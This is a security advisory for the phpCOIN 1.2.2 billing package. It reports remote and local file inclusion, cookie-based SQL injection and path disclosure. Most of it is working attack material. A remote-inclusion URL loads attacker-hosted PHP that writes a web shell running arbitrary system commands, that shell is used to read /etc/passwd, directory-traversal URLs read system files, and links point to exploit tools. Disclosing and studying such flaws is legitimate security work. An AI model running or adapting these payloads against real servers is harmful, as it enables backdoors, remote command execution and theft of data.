PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure software: site: http://www.phpcoin.com/ description: "a free software package originally designed for web-hosting resellers to handle clients, orders, invoices, notes and helpdesk, but no longer limited to hosting resellers. phpCOIN is used by over twenty-five thousand people worldwide*, including web-hosts, designers, lawyers, accountants, and a school band" i) arbitrary remote/local inclusion: vulnerable code in coin_includes/db.php at line 30-39: ... # Determine Database and include proper class file switch($_DBCFG['dbms']) { case "mysql": require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php'); break; default: require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php'); break; } ... if register_globals on and allow_url_fopen on you can include an arbitrary file from a remote location, poc: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location] on remote location you have this code in http:/[remote_location]/db_mysql.php/index.html: <?php $fp=fopen("suntzu.php","w"); fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>"); fclose($fp); ?> then you launch commands: http://[target]/[path]/suntzu.php?cmd=cat%20/etc/passwd if register_globals on and magic_quotes_gpc off you can include an arbitrary file from local resources, poc: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00 http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00 exploit tool here: http://rgod.altervista.org/phpcoin_122_incl_xpl.html ii) if magic_quotes_gpc off -> SQL injection through cookies: exploit code here: http://rgod.altervista.org/phpcoin_122_sql_xpl.html iii) path disclosure, simply: http://[target]/[path]/config.php 'cause in coin_includes/db.php _CCFG['_PKG_PATH_DBSE'] is not defined rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://rgod.altervista.org/phpcoin122.html
